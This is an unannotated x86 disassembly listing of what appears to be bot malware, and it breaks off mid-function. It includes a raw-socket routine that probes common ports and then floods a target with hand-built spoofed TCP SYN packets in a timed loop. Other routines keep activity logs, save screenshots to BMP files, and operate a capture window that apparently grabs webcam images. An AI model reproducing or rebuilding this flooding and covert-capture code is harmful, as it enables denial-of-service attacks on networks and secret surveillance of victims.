var_104 = dword ptr -104h
var_100 = byte ptr -100h
var_9C = word ptr -9Ch
var_9A = word ptr -9Ah
var_98 = dword ptr -98h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
push 1
pop esi
xor ebx, ebx
push esi
push ebx
push ebx
push 0FFh
push 3
push 2
mov [ebp+var_14], esi
call ds:dword_4F5524 ; WSASocketA
lea ecx, [ebp+var_14]
push 4
push ecx
push 2
push ebx
push eax
mov dword_4E6960, eax
call dword_4E30D8 ; setsockopt
call ds:dword_4F537C ; GetTickCount
push eax ; Seed
call _srand
pop ecx
xor eax, eax
push 19h
lea edi, [ebp+var_100]
pop ecx
mov [ebp+var_10C], ebx
mov [ebp+var_7C], ecx
mov [ebp+var_108], ebx
mov [ebp+var_104], ebx
mov [ebp+var_8C], 401h
mov [ebp+var_88], 15h
mov [ebp+var_84], 16h
mov [ebp+var_80], 17h
mov [ebp+var_78], 35h
mov [ebp+var_74], 50h
mov [ebp+var_70], 51h
mov [ebp+var_6C], 58h
mov [ebp+var_68], 6Eh
mov [ebp+var_64], 71h
mov [ebp+var_60], 77h
mov [ebp+var_5C], 87h
mov [ebp+var_58], 89h
mov [ebp+var_54], 8Bh
mov [ebp+var_50], 8Fh
mov [ebp+var_4C], 1BBh
mov [ebp+var_48], 1BDh
mov [ebp+var_44], 400h
mov [ebp+var_40], 599h
mov [ebp+var_3C], 5DCh
mov [ebp+var_38], 6B8h
mov [ebp+var_34], 0CEAh
mov [ebp+var_30], 0D3Dh
mov [ebp+var_2C], 1388h
mov [ebp+var_28], 1A0Bh
mov [ebp+var_24], 1F40h
mov [ebp+var_20], 1F90h
rep stosd
mov [ebp+var_10], ebx
mov [ebp+var_1C], 3
mov [ebp+var_18], 0BB8h
mov [ebp+var_4], ebx
loc_4157F3: ; CODE XREF: sub_4156AF+1BE�j
mov eax, [ebp+arg_0]
mov [ebp+var_9C], 2
mov [ebp+var_98], eax
mov eax, [ebp+var_4]
lea edi, [ebp+eax+var_8C]
mov ax, word ptr [ebp+eax+var_8C]
push eax
call dword_4E30F8 ; htons
push ebx
push esi
push 2
mov [ebp+var_9A], ax
call dword_4E3178 ; socket
lea ecx, [ebp+var_1C]
mov [ebp+var_C], eax
push ecx
lea ecx, [ebp+var_9C]
push 10h
push ecx
push eax
call sub_4155C6
add esp, 10h
mov [ebp+var_8], eax
push [ebp+var_C]
call dword_4E3190 ; closesocket
cmp [ebp+var_8], ebx
jnz short loc_415865
mov ecx, [ebp+var_4]
mov eax, [edi]
mov [ebp+ecx+var_10C], eax
loc_415865: ; CODE XREF: sub_4156AF+1A8�j
add [ebp+var_4], 4
cmp [ebp+var_4], 70h
jl short loc_4157F3
mov esi, offset byte_4E6964
push offset asc_44D258 ; " "
push esi ; Dest
call _sprintf
mov edi, ds:dword_4F537C
pop ecx
pop ecx
call edi ; GetTickCount
mov [ebp+var_C], eax
lea eax, [ebp+var_10C]
mov [ebp+var_4], ebx
mov [ebp+var_8], eax
loc_415898: ; CODE XREF: sub_4156AF+23F�j
call edi ; GetTickCount
sub eax, [ebp+var_C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_4]
ja short loc_4158F0
mov eax, [ebp+var_8]
mov eax, [eax]
cmp eax, ebx
jz short loc_4158C9
push eax
push esi
push offset aSD ; "%s%d "
push esi ; Dest
mov [ebp+var_10], eax
call _sprintf
add esp, 10h
jmp short loc_4158E3
; ---------------------------------------------------------------------------
loc_4158C9: ; CODE XREF: sub_4156AF+203�j
push 0FFFFh
push ebx
call sub_419551
pop ecx
pop ecx
push eax
call dword_4E30F8 ; htons
movzx eax, ax
mov [ebp+var_10], eax
loc_4158E3: ; CODE XREF: sub_4156AF+218�j
inc [ebp+var_4]
add [ebp+var_8], 4
cmp [ebp+var_4], 1Ch
jl short loc_415898
loc_4158F0: ; CODE XREF: sub_4156AF+1FA�j
; sub_4156AF+46B�j
push 28h ; Size
push ebx ; Val
push offset byte_4E6900 ; Dst
call _memset
mov esi, 0FFFFh
mov byte_4E6900, 45h
push esi
push 400h
mov byte_4E6909, 6
mov byte_4E6901, 8
call sub_419551
add esp, 14h
push eax
call dword_4E30F8 ; htons
push 28h
mov word_4E6904, ax
call dword_4E30F8 ; htons
or byte_4E6908, 0FFh
cmp dword_4E68F0, ebx
mov word_4E6902, ax
mov word_4E6906, bx
jnz short loc_415961
push [ebp+arg_0]
call sub_415B29
pop ecx
jmp short loc_41596C
; ---------------------------------------------------------------------------
loc_415961: ; CODE XREF: sub_4156AF+2A5�j
push offset byte_4E62D0
call dword_4E3138 ; inet_addr
loc_41596C: ; CODE XREF: sub_4156AF+2B0�j
mov dword_4E690C, eax
mov eax, [ebp+arg_0]
push 4000h
mov dword_4E6910, eax
mov byte_4E6921, bl
call dword_4E30F8 ; htons
push esi
push ebx
mov word_4E6922, ax
call sub_419551
mov edi, eax
push esi
push ebx
shl edi, 8
call sub_419551
add esp, 10h
add edi, eax
push edi
call dword_4E30F4 ; htonl
mov dword_4E6918, eax
mov al, byte_4E6920
mov edi, [ebp+arg_0]
and al, 0Fh
or al, 50h
push 14h
mov byte_4E6920, al
mov ax, word ptr [ebp+var_10]
mov dword_4E691C, ebx
mov word_4E6926, bx
mov word_4E6916, ax
mov dword_4E693C, edi
mov byte_4E6940, bl
mov byte_4E6941, 6
call dword_4E30F8 ; htons
mov word_4E6942, ax
mov ax, word_4E6916
mov word_4E6928, 2
mov dword_4E692C, edi
mov word_4E692A, ax
mov [ebp+var_4], ebx
jmp short loc_415A22
; ---------------------------------------------------------------------------
loc_415A1D: ; CODE XREF: sub_4156AF+445�j
mov esi, 0FFFFh
loc_415A22: ; CODE XREF: sub_4156AF+36C�j
cmp [ebp+var_4], ebx
jnz short loc_415A56
push esi
push ebx
call sub_419551
pop ecx
pop ecx
push eax
call dword_4E30F8 ; htons
mov word_4E6914, ax
mov eax, dword_4E690C
mov dword_4E6938, eax
mov byte_4E6921, 2
mov dword_4E691C, ebx
jmp short loc_415A75
; ---------------------------------------------------------------------------
loc_415A56: ; CODE XREF: sub_4156AF+376�j
push esi
push ebx
mov byte_4E6921, 10h
call sub_419551
pop ecx
pop ecx
push eax
call dword_4E30F8 ; htons
movzx eax, ax
mov dword_4E691C, eax
loc_415A75: ; CODE XREF: sub_4156AF+3A5�j
inc word_4E6904
inc dword_4E6918
mov ax, word_4E6916
push 5
pop ecx
mov esi, offset word_4E6914
mov edi, offset dword_4E6944
mov word_4E690A, bx
mov word_4E6924, bx
push 14h
rep movsd
mov esi, offset byte_4E6900
mov word_4E692A, ax
push esi
call sub_40AFCA
push 20h
push offset dword_4E6938
mov word_4E690A, ax
call sub_40AFCA
add esp, 10h
mov word_4E6924, ax
push 10h
push offset word_4E6928
push ebx
push 28h
push esi
push dword_4E6960
call dword_4E315C ; sendto
inc [ebp+var_4]
cmp [ebp+var_4], 3FFh
jl loc_415A1D
call ds:dword_4F537C ; GetTickCount
sub eax, [ebp+var_C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_4]
ja short loc_415B1F
push [ebp+arg_8]
call ds:dword_4F534C ; Sleep
jmp loc_4158F0
; ---------------------------------------------------------------------------
loc_415B1F: ; CODE XREF: sub_4156AF+460�j
pop edi
pop esi
mov eax, offset byte_4E6964
pop ebx
leave
retn
sub_4156AF endp
; =============== S U B R O U T I N E =======================================
sub_415B29 proc near ; CODE XREF: sub_4156AF+2AA�p
arg_0 = dword ptr 4
push 0FFFEh
push 1
call sub_419551
pop ecx
pop ecx
mov ecx, [esp+arg_0]
shl eax, 10h
and ecx, 0FFFFh
or eax, ecx
retn
sub_415B29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_415B47(char *Str2,int)
sub_415B47 proc near ; CODE XREF: sub_401CC7+72A8�p
var_4 = dword ptr -4
Str2 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push edi
mov esi, offset dword_455298
mov edi, 0B8h
loc_415B5B: ; CODE XREF: sub_415B47+33�j
cmp byte ptr [esi], 0
jz short loc_415B7E
push [ebp+Str2] ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_415B7E
inc [ebp+var_4]
add esi, edi
cmp esi, offset dword_455E18
jl short loc_415B5B
jmp short loc_415BC0
; ---------------------------------------------------------------------------
loc_415B7E: ; CODE XREF: sub_415B47+17�j
; sub_415B47+26�j
mov esi, [ebp+var_4]
push ebx
imul esi, 0B8h
push edi ; Size
push 0 ; Val
lea ebx, dword_455298[esi]
push ebx ; Dst
call _memset
push 17h ; Count
push [ebp+Str2] ; Source
push ebx ; Dest
call _strncpy
push 9Fh ; Count
lea eax, dword_4552B0[esi]
push [ebp+arg_4] ; Source
push eax ; Dest
call _strncpy
add esp, 24h
inc dword_43F494
pop ebx
loc_415BC0: ; CODE XREF: sub_415B47+35�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_415B47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_415BC7(int,char *Str,int)
sub_415BC7 proc near ; CODE XREF: sub_401CC7+28CE�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0 ; int
push [ebp+arg_8] ; int
push offset dword_44D264 ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 14h
xor edi, edi
mov esi, offset dword_455298
loc_415BF1: ; CODE XREF: sub_415BC7+72�j
cmp byte ptr [esi], 0
jz short loc_415C2C
lea eax, [esi+18h]
push eax
push esi
push edi
push offset aD_ ; "%d. "
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 2Ch
loc_415C2C: ; CODE XREF: sub_415BC7+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_455E18
jl short loc_415BF1
pop edi
pop esi
leave
retn
sub_415BC7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415C3F proc near ; CODE XREF: WinMain(x,x,x,x)+384�p
; WinMain(x,x,x,x)+408�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
lea eax, [ebp+var_10]
push edi
push eax
call ds:dword_4F5404 ; GetLocalTime
mov ebx, offset byte_4EAD68
mov edi, 80h
mov esi, offset byte_4E6D68
loc_415C61: ; CODE XREF: sub_415C3F+3D�j
cmp byte ptr [ebx], 0
jz short loc_415C78
push 7Fh ; Count
lea eax, [ebx+80h]
push ebx ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_415C78: ; CODE XREF: sub_415C3F+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_415C61
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi ; Count
push esi ; Dest
call __snprintf
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_415C3F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_415CB3(char *Format,char Args)
sub_415CB3 proc near ; CODE XREF: sub_4019E7+F7�p
; sub_401CC7:loc_402269�p ...
Dest = byte ptr -80h
Format = dword ptr 8
Args = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+Args]
push eax ; Args
lea eax, [ebp+Dest]
push [ebp+Format] ; Format
push 80h ; Count
push eax ; Dest
call __vsnprintf
lea eax, [ebp+Dest]
push eax
call sub_415C3F
add esp, 14h
leave
retn
sub_415CB3 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp [ebp+14h], ebx
push esi
mov dword ptr [ebp-8], 80h
mov [ebp-4], ebx
jnz short loc_415D0E
push ebx
push dword ptr [ebp+10h]
push offset dword_44D2B0
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_409D34
add esp, 14h
loc_415D0E: ; CODE XREF: .text:00415CF5�j
cmp [ebp+18h], ebx
jz short loc_415D26
push dword ptr [ebp+18h]
call _atoi
cmp eax, ebx
pop ecx
mov [ebp-4], eax
jz short loc_415D26
mov [ebp-8], eax
loc_415D26: ; CODE XREF: .text:00415D11�j
; .text:00415D21�j
mov [ebp+14h], ebx
mov esi, offset byte_4E6D68
loc_415D2E: ; CODE XREF: .text:00415D76�j
mov eax, [ebp+14h]
cmp eax, [ebp-8]
jge short loc_415D78
cmp [esi], bl
jz short loc_415D67
cmp [ebp+18h], ebx
jz short loc_415D53
cmp [ebp-4], ebx
jnz short loc_415D53
push dword ptr [ebp+18h]
push esi
call sub_418D9F
pop ecx
test eax, eax
pop ecx
jz short loc_415D67
loc_415D53: ; CODE XREF: .text:00415D3D�j
; .text:00415D42�j
push 1
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_409D34
add esp, 14h
loc_415D67: ; CODE XREF: .text:00415D38�j
; .text:00415D51�j
inc dword ptr [ebp+14h]
add esi, 80h
cmp esi, offset byte_4EAD68
jl short loc_415D2E
loc_415D78: ; CODE XREF: .text:00415D34�j
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_415D7C(int,char *Str,int,int)
sub_415D7C proc near ; CODE XREF: sub_401CC7+27C5�p
arg_0 = dword ptr 4
Str = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset byte_4E6D68
xor ecx, ecx
loc_415D83: ; CODE XREF: sub_415D7C+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset byte_4EAD68
jl short loc_415D83
cmp [esp+arg_C], ecx
jnz short loc_415DB1
push ecx ; int
push [esp+4+arg_8] ; int
push offset dword_44D2BC ; int
push [esp+0Ch+Str] ; Str
push [esp+10h+arg_0] ; int
call sub_409D34
add esp, 14h
loc_415DB1: ; CODE XREF: sub_415D7C+19�j
push offset dword_44D2D0
call sub_415C3F
pop ecx
retn
sub_415D7C endp
; ---------------------------------------------------------------------------
push esi
mov esi, offset byte_4E6D68
loc_415DC3: ; CODE XREF: .text:00415DE4�j
cmp byte ptr [esi], 0
jz short loc_415DD8
push dword ptr [esp+8]
push esi
call sub_418D9F
pop ecx
test eax, eax
pop ecx
jnz short loc_415DEA
loc_415DD8: ; CODE XREF: .text:00415DC6�j
add esi, 80h
cmp esi, offset byte_4EAD68
jl short loc_415DC3
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_415DEA: ; CODE XREF: .text:00415DD6�j
push 1
pop eax
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415DEF proc near ; DATA XREF: sub_401CC7+2878�o
Dest = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
Str = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
push 1
rep movsd
xor edx, edx
pop edi
cmp [ebp+var_10], edx
mov [ebp+var_8], 80h
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_415E42
push edx ; int
lea eax, [ebp+var_118]
push [ebp+var_14] ; int
push offset dword_44D2E4 ; int
push eax ; Str
push [ebp+var_11C] ; int
call sub_409D34
add esp, 14h
loc_415E42: ; CODE XREF: sub_415DEF+33�j
cmp [ebp+Str], 0
jz short loc_415E62
lea eax, [ebp+Str]
push eax ; Str
call _atoi
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_415E62
mov [ebp+var_8], eax
loc_415E62: ; CODE XREF: sub_415DEF+5A�j
; sub_415DEF+6E�j
and [ebp+arg_0], 0
mov esi, offset byte_4E6D68
loc_415E6B: ; CODE XREF: sub_415DEF+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_415EC5
cmp byte ptr [esi], 0
jz short loc_415EB4
cmp [ebp+Str], 0
jz short loc_415E9A
cmp [ebp+var_4], 0
jnz short loc_415E9A
lea eax, [ebp+Str]
push eax ; int
push esi ; Str
call sub_418D9F
pop ecx
test eax, eax
pop ecx
jz short loc_415EB4
loc_415E9A: ; CODE XREF: sub_415DEF+90�j
; sub_415DEF+96�j
push edi ; int
lea eax, [ebp+var_118]
push [ebp+var_14] ; int
push esi ; int
push eax ; Str
push [ebp+var_11C] ; int
call sub_409D34
add esp, 14h
loc_415EB4: ; CODE XREF: sub_415DEF+87�j
; sub_415DEF+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset byte_4EAD68
jl short loc_415E6B
loc_415EC5: ; CODE XREF: sub_415DEF+82�j
lea eax, [ebp+Dest]
push offset asc_44D300 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
pop ecx
cmp [ebp+var_10], esi
pop ecx
jnz short loc_415EFF
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+var_118]
push eax ; Str
push [ebp+var_11C] ; int
call sub_409D34
add esp, 14h
loc_415EFF: ; CODE XREF: sub_415DEF+EE�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_18]
call sub_40BA72
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_415DEF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415F1E proc near ; CODE XREF: sub_401CC7+73F8�p
var_484 = byte ptr -484h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = dword ptr -26h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 484h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push offset aDisplay ; "DISPLAY"
call dword_4E30E4 ; CreateDCA
mov edi, eax
cmp edi, esi
mov [ebp+var_20], edi
jz loc_416152
push 8
push edi
call dword_4E3100 ; GetDeviceCaps
push 0Ah
push edi
mov [ebp+var_8], eax
call dword_4E3100 ; GetDeviceCaps
push 0Ch
push edi
mov [ebp+var_C], eax
call dword_4E3100 ; GetDeviceCaps
cmp eax, 8
mov [ebp+var_10], eax
ja short loc_415F80
push 18h
push edi
call dword_4E3100 ; GetDeviceCaps
mov ebx, 100h
jmp short loc_415F82
; ---------------------------------------------------------------------------
loc_415F80: ; CODE XREF: sub_415F1E+50�j
xor ebx, ebx
loc_415F82: ; CODE XREF: sub_415F1E+60�j
push edi
call dword_4E3144 ; CreateCompatibleDC
cmp eax, esi
mov [ebp+var_4], eax
jz loc_416137
mov eax, [ebp+var_8]
push esi
mov [ebp+var_80], eax
mov eax, [ebp+var_C]
mov [ebp+var_7C], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+var_76], ax
lea eax, [ebp+var_18]
push esi
push eax
lea eax, [ebp+var_84]
push 1
push eax
push edi
mov [ebp+var_84], 28h
mov [ebp+var_78], 1
mov [ebp+var_74], esi
mov [ebp+var_70], esi
mov [ebp+var_6C], esi
mov [ebp+var_68], esi
mov [ebp+var_64], ebx
mov [ebp+var_60], ebx
call dword_4E313C ; CreateDIBSection
cmp eax, esi
mov [ebp+var_1C], eax
jz loc_416142
push eax
push [ebp+var_4]
call dword_4E2FC8 ; SelectObject
cmp eax, esi
jz loc_416142
cmp eax, 0FFFFFFFFh
jz loc_416142
push 0CC0020h
push esi
push esi
push edi
push [ebp+var_C]
push [ebp+var_8]
push esi
push esi
push [ebp+var_4]
call dword_4E3140 ; BitBlt
test eax, eax
jz loc_416142
cmp ebx, esi
jz short loc_41603F
lea eax, [ebp+var_484]
push eax
push ebx
push esi
push [ebp+var_4]
call dword_4E301C ; GetDIBColorTable
mov ebx, eax
loc_41603F: ; CODE XREF: sub_415F1E+10B�j
mov edi, [ebp+var_10]
mov ecx, [ebp+var_8]
imul edi, [ebp+var_C]
imul edi, ecx
mov eax, ebx
push esi
shr edi, 3
shl eax, 2
mov [ebp+var_8], eax
push 80h
lea edx, [eax+edi+36h]
add eax, 36h
push 2
mov [ebp+var_26], eax
mov eax, [ebp+var_C]
push esi
push esi
push 40000000h
push [ebp+arg_0]
mov [ebp+var_50], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+var_30], 4D42h
mov [ebp+var_2E], edx
mov [ebp+var_2A], si
mov [ebp+var_28], si
mov [ebp+var_58], 28h
mov [ebp+var_54], ecx
mov [ebp+var_4C], 1
mov [ebp+var_4A], ax
mov [ebp+var_48], esi
mov [ebp+var_44], esi
mov [ebp+var_40], esi
mov [ebp+var_3C], esi
mov [ebp+var_38], ebx
mov [ebp+var_34], esi
call ds:dword_4F53C0 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_416122
lea ecx, [ebp+var_14]
push esi
push ecx
lea ecx, [ebp+var_30]
push 0Eh
push ecx
push eax
call ds:dword_4F53B4 ; WriteFile
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_58]
push 28h
push eax
push [ebp+arg_0]
call ds:dword_4F53B4 ; WriteFile
cmp ebx, esi
jz short loc_416104
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_484]
push [ebp+var_8]
push eax
push [ebp+arg_0]
call ds:dword_4F53B4 ; WriteFile
loc_416104: ; CODE XREF: sub_415F1E+1CC�j
lea eax, [ebp+var_14]
push esi
push eax
push edi
push [ebp+var_18]
push [ebp+arg_0]
call ds:dword_4F53B4 ; WriteFile
push [ebp+arg_0]
call ds:dword_4F533C ; CloseHandle
push 1
pop esi
loc_416122: ; CODE XREF: sub_415F1E+1A2�j
push [ebp+var_1C]
call dword_4E3054 ; DeleteObject
push [ebp+var_4]
call dword_4E2FB4 ; DeleteDC
mov edi, [ebp+var_20]
loc_416137: ; CODE XREF: sub_415F1E+70�j
push edi
call dword_4E2FB4 ; DeleteDC
mov eax, esi
jmp short loc_416154
; ---------------------------------------------------------------------------
loc_416142: ; CODE XREF: sub_415F1E+C7�j
; sub_415F1E+D9�j ...
push edi
call dword_4E2FB4 ; DeleteDC
push [ebp+var_4]
call dword_4E2FB4 ; DeleteDC
loc_416152: ; CODE XREF: sub_415F1E+23�j
xor eax, eax
loc_416154: ; CODE XREF: sub_415F1E+222�j
pop edi
pop esi
pop ebx
leave
retn
sub_415F1E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_416159(int,size_t Size,int,int)
sub_416159 proc near ; CODE XREF: sub_401CC7+751F�p
var_34 = byte ptr -34h
var_20 = dword ptr -20h
Memory = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Size = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 1
pop esi
xor ebx, ebx
push esi
push dword_4EAD6C
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow ; "Window"
call dword_4E3048
mov edi, eax
cmp edi, ebx
mov [ebp+var_4], edi
jnz short loc_416197
mov eax, esi
jmp loc_41634D
; ---------------------------------------------------------------------------
loc_416197: ; CODE XREF: sub_416159+35�j
push edi
call dword_4E3098 ; IsWindow
test eax, eax
jz short loc_4161B4
push ebx
push [ebp+Size]
push 40Ah
push edi
call dword_4E3154 ; SendMessageA
jmp short loc_4161B6
; ---------------------------------------------------------------------------
loc_4161B4: ; CODE XREF: sub_416159+47�j
xor eax, eax
loc_4161B6: ; CODE XREF: sub_416159+59�j
cmp eax, ebx
jnz short loc_4161C1
loc_4161BA: ; CODE XREF: sub_416159+88�j
; sub_416159+BC�j
mov ebx, esi
jmp loc_416342
; ---------------------------------------------------------------------------
loc_4161C1: ; CODE XREF: sub_416159+5F�j
push edi
call dword_4E3098 ; IsWindow
test eax, eax
jz short loc_4161DE
lea eax, [ebp+var_34]
push eax
push 2Ch
push 40Eh
push edi
call dword_4E3154 ; SendMessageA
loc_4161DE: ; CODE XREF: sub_416159+71�j
cmp [ebp+var_20], ebx
jz short loc_4161BA
push edi
call dword_4E3098 ; IsWindow
test eax, eax
mov edi, 42Ch
jz short loc_416204
push ebx
push ebx
push edi
push [ebp+var_4]
call dword_4E3154 ; SendMessageA
mov [ebp+Size], eax
jmp short loc_416207
; ---------------------------------------------------------------------------
loc_416204: ; CODE XREF: sub_416159+98�j
mov [ebp+Size], ebx
loc_416207: ; CODE XREF: sub_416159+A9�j
push [ebp+Size] ; Size
call _malloc
cmp eax, ebx
pop ecx
mov [ebp+Memory], eax
jz short loc_4161BA
push [ebp+Size] ; Size
call _malloc
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_41622E
push 1
pop ebx
jmp loc_416342
; ---------------------------------------------------------------------------
loc_41622E: ; CODE XREF: sub_416159+CB�j
push [ebp+var_4]
call dword_4E3098 ; IsWindow
test eax, eax
jz short loc_41624B
push [ebp+Memory]
push [ebp+Size]
push edi
push [ebp+var_4]
call dword_4E3154 ; SendMessageA
loc_41624B: ; CODE XREF: sub_416159+E0�j
push [ebp+Size] ; Size
push [ebp+Memory] ; Src
push esi ; Dst
call _memcpy
mov ecx, [ebp+arg_8]
add esp, 0Ch
cmp ecx, ebx
jg short loc_416266
mov ecx, 280h
loc_416266: ; CODE XREF: sub_416159+106�j
mov eax, [ebp+arg_C]
cmp eax, ebx
jg short loc_416272
mov eax, 1E0h
loc_416272: ; CODE XREF: sub_416159+112�j
push [ebp+var_4]
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call dword_4E3098 ; IsWindow
test eax, eax
mov edi, 42Dh
jz short loc_4162BC
push esi
push [ebp+Size]
push edi
push [ebp+var_4]
call dword_4E3154 ; SendMessageA
loc_4162BC: ; CODE XREF: sub_416159+153�j
push [ebp+var_4]
call dword_4E3098 ; IsWindow
test eax, eax
jz short loc_4162D9
push ebx
push ebx
push 43Dh
push [ebp+var_4]
call dword_4E3154 ; SendMessageA
loc_4162D9: ; CODE XREF: sub_416159+16E�j
push [ebp+var_4]
call dword_4E3098 ; IsWindow
test eax, eax
jz short loc_4162F8
push [ebp+arg_0]
push ebx
push 419h
push [ebp+var_4]
call dword_4E3154 ; SendMessageA
loc_4162F8: ; CODE XREF: sub_416159+18B�j
push [ebp+var_4]
call dword_4E3098 ; IsWindow
test eax, eax
jz short loc_416315
push [ebp+Memory]
push [ebp+Size]
push edi
push [ebp+var_4]
call dword_4E3154 ; SendMessageA
loc_416315: ; CODE XREF: sub_416159+1AA�j
push [ebp+Memory] ; Memory
call _free
push esi ; Memory
call _free
pop ecx
pop ecx
push [ebp+var_4]
call dword_4E3098 ; IsWindow
test eax, eax
